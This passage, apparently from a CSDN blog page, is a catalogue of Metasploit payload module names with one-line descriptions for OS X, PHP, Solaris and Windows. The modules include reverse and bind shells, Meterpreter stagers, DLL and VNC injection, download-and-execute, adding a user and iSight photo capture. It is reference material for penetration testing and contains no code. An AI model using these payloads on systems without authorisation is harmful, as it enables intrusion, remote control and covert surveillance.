osx/armle/execute/bind_tcp normal OSX Write and Execute Binary, Bind TCP Stager
osx/armle/execute/reverse_tcp normal OSX Write and Execute Binary, Reverse TCP Stager
osx/armle/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
osx/armle/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
osx/armle/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
osx/armle/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
osx/armle/vibrate normal OSX iPhone Vibrate
osx/ppc/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
osx/ppc/shell/find_tag normal OSX Command Shell, Find Tag Stager
osx/ppc/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
osx/ppc/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
osx/ppc/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
osx/x64/exec normal OSX x64 Execute Command
osx/x86/bundleinject/bind_tcp normal Mac OS X Inject Mach-O Bundle, Bind TCP Stager
osx/x86/bundleinject/reverse_tcp normal Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
osx/x86/exec normal OSX Execute Command
osx/x86/isight/bind_tcp normal Mac OS X x86 iSight photo capture, Bind TCP Stager
osx/x86/isight/reverse_tcp normal Mac OS X x86 iSight photo capture, Reverse TCP Stager
osx/x86/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
osx/x86/shell_find_port normal OSX Command Shell, Find Port Inline
osx/x86/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
osx/x86/vforkshell/bind_tcp normal OSX (vfork) Command Shell, Bind TCP Stager
osx/x86/vforkshell/reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Stager
osx/x86/vforkshell_bind_tcp normal OSX (vfork) Command Shell, Bind TCP Inline
osx/x86/vforkshell_reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6
php/bind_php normal PHP Command Shell, Bind TCP (via php)
php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
php/shell_findsock normal PHP Command Shell, Find Sock
solaris/sparc/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
solaris/sparc/shell_find_port normal Solaris Command Shell, Find Port Inline
solaris/sparc/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
solaris/x86/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
solaris/x86/shell_find_port normal Solaris Command Shell, Find Port Inline
solaris/x86/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
tty/unix/interact normal Unix TTY, Interact with established connection
windows/adduser normal Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager
windows/dllinject/find_tag normal Reflective DLL Injection, Find Tag Ordinal Stager
windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http normal Reflective DLL Injection, Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS)
windows/dns_txt_query_exec normal DNS TXT Record Payload Download and Execution
windows/download_exec normal Windows Executable Download and Execute
windows/download_exec_https normal Windows Executable Download (http,https,ftp) and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt injection), Find Tag Ordinal Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_http normal Windows Command Shell, Reverse HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say “You Got Pwned!”
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_http normal Windows Upload/Execute, Reverse HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http normal VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
windows/x64/exec normal Windows x64 Execute Command
windows/x64/loadlibrary normal Windows x64 LoadLibrary Path
windows/x64/meterpreter/bind_tcp normal Windows x64 Meterpreter, Windows x64 Bind TCP Stager
windows/x64/meterpreter/reverse_tcp normal Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager
windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager
windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline
windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页